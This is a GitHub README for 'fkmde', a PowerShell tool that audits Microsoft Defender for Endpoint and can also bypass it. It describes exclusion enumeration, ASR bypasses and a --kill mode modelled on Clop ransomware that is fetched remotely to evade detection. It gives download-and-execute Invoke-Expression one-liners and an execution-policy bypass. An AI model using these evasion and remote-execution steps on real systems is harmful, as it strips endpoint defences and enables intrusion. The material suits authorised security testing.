Skip to content

fkxdr/fkmde

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

149 Commits
additional
additional
 
 
README.md
README.md
 
 
fkmde.ps1
fkmde.ps1
 
 

Repository files navigation

fkmde

image

fkmde is a specialized powershell script designed to evaluate the configuration and operational security of Microsoft Defender for Endpoint (MDE). It aids security professionals, system administrators, and penetration testers in identifying potential vulnerabilities and misconfigurations that might be exploited in a real-world attack.

Features

  • Defender Full Audit: Quickly assesses the status of real-time protection, active/passive mode, tamper protection, bitlocker, memory integrity and exclusion settings to detect overly permissive rules that might allow malware to bypass scanning.
  • Bypass Exclusions and ASR Rules: Utilizes Event 1121 and 5007 to bypass the protected exclusions list in MDE.
  • Exclusion Enumeration: Allows for low privilege exclusion enumeration, without relying on event log bypass.
  • Defender Tampering: PendingFileRenameOperations + Junctions EDR Disable
  • Defender Killing: The script uses techniques similar to those used by Clop Ransomware to disable and evade Microsoft Defender.

Usage

fkmde.ps1
fkmde.ps1 --enum <path> [depth]
fkmde.ps1 --kill                     # Run the script from URL
fkmde.ps1 --kill <path>              # Specify a directory for the script to download & execute from

  • --kill Parameter
    This parameter triggers a script that implements techniques similar to those used by Clop Ransomware to disable and evade Microsoft Defender. The script is not hardcoded into fkmde, but dynamically fetched from an external source to avoid pre-execution detection. This should be used only in secure, isolated environments for research purposes. It is possible to specify a custom directory using the optional argument to download and run the kill script.

  • --enum <path> [depth] Parameter
    This parameter performs a comprehensive enumeration of directories by using MpCmdRun.exe, scanning for exclusions or misconfigurations without relying on event logs or admin permissions. The script dynamically disables Windows Defender popup notifications during execution to provide a seamless experience without alerting users. Upon completion, it safely re-enables the notifications.

Note

Any scripts tampering with the defender are not directly embedded in fkmde. Instead, they are loaded dynamically to minimize detection by Defender for Endpoint when the tool is used solely for enumeration purposes.

The script can also be run with and without parameterized modes directly from github.

  // basic method with iex
  Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fkxdr/fkmde/refs/heads/main/fkmde.ps1')

  // parameterized mode with iex and irm
  Invoke-Expression "& { $(Invoke-RestMethod https://raw.githubusercontent.com/fkxdr/fkmde/refs/heads/main/fkmde.ps1) } --enum C:\Windows 3"

By default, the PowerShell execution policy is set to Restricted on clients, and RemoteSigned on servers, when a new powershell.exe process is started. These policies block the execution of (unsigned) scripts, but they can be overriden within the current scope. However, this trick does not work when the execution policy is enforced through a GPO. In this case, after starting a new PowerShell session, you can load the script with the second command.

Set-ExecutionPolicy Bypass -Scope Process -Force
Get-Content .\fkmde.ps1 | Out-String | Invoke-Expression

image

image

image

image

image

flowchart TD
    start((Microsoft Defender))
    
    start --> MDEENUM[Enumerate Defender settings]
    MDEENUM --> |fkmde.ps1| MDEVULN[Identify vulnerable configurations]
    MDEENUM --> |Windows UI| MDEVULN
    
    MDEVULN --> MDEVULNASR[ASR rules]
    MDEVULNASR --> |officemacro32.docm| MDEASREXP[Exploit ASR misconfiguration]
    MDEVULNASR --> |wmiprocess.ps1| MDEASREXP
    
    MDEVULN --> MDEEXCLUSION[Defender exclusions]
    MDEEXCLUSION --> |fkmde.ps1| EXPLOITEXCL[Exploit exclusions]
    MDEEXCLUSION --> |fkmde.ps1 --enum| EXPLOITEXCL[Exploit exclusions]
    
    MDEVULN --> MDEMISCONF[Tamper Protection]
    MDEMISCONF --> |fkmde.ps1 --kill| MDEKILL[Kill Defender process]
    
    start --> MDEBYPASS[Attempt to bypass static Defender]
    MDEBYPASS --> |ps1-obfuscator.ps1| MDEBYPASS2[Bypass Defender]
    
    start --> MDESSCR[Review Smart Screen settings]
    MDESSCR --> |Test with URL| MDESSCRVULN[Exploit vulnerable Smart Screen]
Loading

Disclaimer

This tool is intended for educational and security research purposes only. The author is not responsible for misuse or for any damage that may occur from using this tool. It is the end user's responsibility to comply with all applicable laws and regulations. The use of this tool against targets without prior mutual consent is illegal.

Credits

  • VakninHai - Privilege Bypassing through Windows Event 5007
  • ViziosDe - Privilege Bypassing through Windows Event 1121
  • Friends Security - Exclusions through MpCmdRun.exe
  • rad9800 - PendingFileRenameOperations + Junctions EDR Disable

About

fkmde is designed to help testing various features in Microsoft Defender for Endpoint.

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

fkmde v1.0.0 Latest
Dec 21, 2024

Packages

No packages published

Languages